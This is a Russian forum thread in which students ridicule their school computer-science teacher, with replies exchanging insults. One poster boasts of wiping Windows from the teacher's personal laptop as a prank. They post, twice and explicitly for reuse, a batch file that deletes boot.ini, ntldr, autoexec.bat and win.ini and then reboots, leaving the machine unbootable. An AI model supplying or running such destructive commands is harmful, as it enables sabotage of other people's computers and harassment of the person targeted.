Школы
А ваша информатичка тупая Смотри внутри
Недавно в школе началась информатика. Училка постоянно объясняет "Чтобы открыть paint нужно навести указателем мыши на кнопку пуск нажать левой кнопкой мыши навести указателем на пункт программы -подвинуть указатель вправо на появившийся список передвинуть указатель на пункт стандартные подвинуть указатель вправо переместить указатель на paint нажать левой кнопкой мыши" - фраза на уроке повторялась пять раз информатика началась в сентябре. Каждый урок была такая байда . Я узнал что самый современный процессор Pentium III !!!(спасибо хоть не 386ой). На первом практическом уроке училка учила включать компьютер, двигать мышкой. Есть куча бредовых заданий "набрать слово в блокноте повторяя чтобы открыть блокнот нужно... чтобы сохранить набранное нужно...", "создать папку через проводник" " открыть сд ром" Если у информатички на компе ошибка виндовз или вылазит сообщение о том, что обнаружен вирус , она весь урок паникует, а мы радуемся, что у нас нет информатики У вас такая же училка? Пишите в огтветы истории про свою информатичку? Дам лучший ответ тому кто напишет самую ржачную историю из тех что были на уроках информатики у нас в классе все с компом я умею писать проги на delphi может ей какойнибудь прикол на комп кинуть эта коза и биологию ведёт Я както раз сдавал ей тест на знание painta и у меня выскочило окно обнаружен вирус С криком что ты тут натворил!!!!она влепила мне за тест 3 если верить старшим она в 8 классе учит как заходить в инет ей 45 лет мы над ней поиздевались выключив NumLOck =) XD училка тогда в винду зайти не могла у неё пароль 12345 Я конечно не имею права критиковать школьную программу, но почему информатику ведёт человек, который паникует при обновлении антивируса?
Нда, ппц. Это не информатика ни разу! Это, блджад, какое-то обучение мышеклацанию в Винде.
Полина Титченкова
ха, у нас учителя информатики так же зовут
Гнать надо таких "специалистов" поганой метлой.
да уж.. . из меня бы конечно вышла бы тоже тупая училка (географии только) , но не настолько.
А ваша информатичка просто работает по шаблону и больше ничего не знает, вот и все. А вам бы, ученикам, доходчиво ей объяснить что вы уже знаете такие вещи, что ей и не снились, только покорректнее. Вот думаю и все.
Ты мудак! Отучись сначала в универе, добейся хоть чего-то в этой жизни, а потом оскорбляй и обсуждай людей на порядок старше тебя!
Не все могут программировать на дельфи, также как многие не могут зайти в paint! радуйся что у тебя класс такой умный, и ты гений информатики) )
уверен что и ты ничего выдающегося ни на дельфи, ни на чем-либо другом не напишешь.. . короче, ты лол и лох!
Краснополка Нина Опс Ференс
На дельфи очень просто программировать. Вот попробуй на C++ что-нибудь написать, а потом уже оскорбляй
Татьяна Воробьева
так... зачем ты его оскаешь? он говорит правду, зачем принимать на работу учителя информатики который ничего о пк не знает. кста ты даже не знаешь что такое лол
короч у нас информатичка норм не говорит типа нажмите туда сюда но я её очень жёстко тролю то поменяю ориентацию экрана то батник напишу типа что бы бесконечно окна открывал она бесится не понимает в чём дело но на прошлом уроке вообще так забомбила короч когда она пошла за журналом я сбросил на её комп (а он её собственный ноут она его на каждый урок носит) батник (если кому надо внизу будет) и полностью ей винду снёс :-)она была в бешенстве ибо её дорогостоящий ноут превратился в бесполезное железо
Псс... Вот батник
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
и надо ещё после этого перезагрузить комп
Псс... Вот батник
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Нам вот сказали "Скачайте диск на компьютер и пойдите тест"
Таня Юрченко
как его пойти?
Таня Юрченко
можно только пройти
Таня Юрченко
Я говорю, мол, нет у меня сд-рома, а она: "СКАЧАЙ ДИСК НА КОМПЬЮТЕР! Я НЕ ГОВОРИЛА ЧТО СД РОМ НУЖЕН!"
у нас в школе тоже тупая информатичка в Тюмени